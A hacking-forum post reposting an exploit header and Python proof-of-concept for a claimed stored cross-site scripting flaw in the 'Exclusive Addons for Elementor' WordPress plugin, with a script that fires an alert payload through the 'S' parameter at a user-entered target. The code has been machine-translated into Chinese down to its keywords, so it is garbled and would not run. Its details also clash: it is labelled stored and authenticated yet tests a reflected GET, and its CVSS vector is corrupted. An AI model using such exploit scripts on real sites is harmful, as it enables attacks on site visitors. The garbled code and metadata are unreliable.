H

Elementor 2.6.9的独家插件- 存储的跨站点脚本(XSS)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#exploit title: Elementor≤2.6.9的独家插件- 经过身份验证的跨站点脚本(XSS)
#原始作者: WordFence安全团队
#利用作者: Al Baradi Joy
#利用日期: 2024年3月13日
#供应商HomePage3360 https://exclusiveaddons.com/
#软件link: https://wordpress.org/plugins/exclusive-addons-for-elementor/
#版本:直至2.6.9
#测试版本: 2.6.9
#CVE ID: CVE-2024-1234
#漏洞type:存储的跨站点脚本(XSS)
#Description:
用于WordPress的Elementor的独家插件的独家插件,在版本中
包括2.6.9,容易受到存储的跨站点脚本(XSS)的攻击
“ S”参数。由于输入消毒不当和输出逃脱,
具有贡献者级别权限或更高的攻击者可以注入
当用户查看受影响的页面时执行的任意JavaScript。
#概念证明:是
#类别: Web应用程序,跨站点脚本(XSS),WordPress插件
#CVSS得分: 6.5(中)
#CVSS Vector: CVSS:3.1/AV:N/AC:L/PR3:L/UI:R/S:C/C:C/C33:L/I3:L
#NOTES:
为了利用这种漏洞,攻击者需要身份验证的用户角色
允许编辑帖子。注射恶意的JavaScript可能会导致
会话劫持,重定向和其他客户端攻击。
##利用代码:
``python
导入请求
来自urllib.parse导入urlparse
# 横幅
def display_banner():
exploit_title='cve-2024-1234: Elementor插件的独家插件
存储XSS'
打印('='*50)
打印(f'Exploit title: {exploit_title}')
印刷(“由Al Baradi Joy制造”)
打印('='*50)
#验证URL的功能
def validate_url(url):
#检查URL是否有效且形成良好
parsed_url=urlparse(url)
如果不是parsed_url.scheme,则在['http','https'] :中
print('error:无效的URL。请确保URL以http://开头
或https://')
返回false
返回true
#功能利用XSS漏洞
def exploit_xss(target_url):
#XSS有效载荷要注入
有效载荷='scriptalert('xss exploit')/脚本'
#要传递的参数(在这种情况下,我们正在利用“ S”
范围)
params={
'S':有效载荷
}
#带有有效载荷的弱势URL发送GET请求
TRY:
打印(f'Sending利用为: {target_url}')
响应=requests.get(target_url,params=params,timeout=10)
#检查状态代码是否还可以,以及是否反映了有效载荷
反应
如果wif whesps.status_code==200和有效载荷响应。Text:
打印(f'xss漏洞成功!有效载荷: {有效载荷}')
elif响应。STATUS_CODE!=200:
打印(F'Error:收到非OK状态代码
{Response.status_code}')
其他:
打印(“漏洞失败或没有反映XSS。”)
除了requests.exceptions.requestexception为e:
打印(f'Error:请求失败- {e}')
除异常外,E:
打印(f'un Expect Orror: {e}')
如果name=='__ -Main __':
#显示横幅
display_banner()
#向用户询问目标URL
target_url=input('输入目标url:').strip()
#验证提供的URL
如果validate_url(target_url):
#如果URL有效,请调用利用功能
exploit_xss(target_url)
 
后退
顶部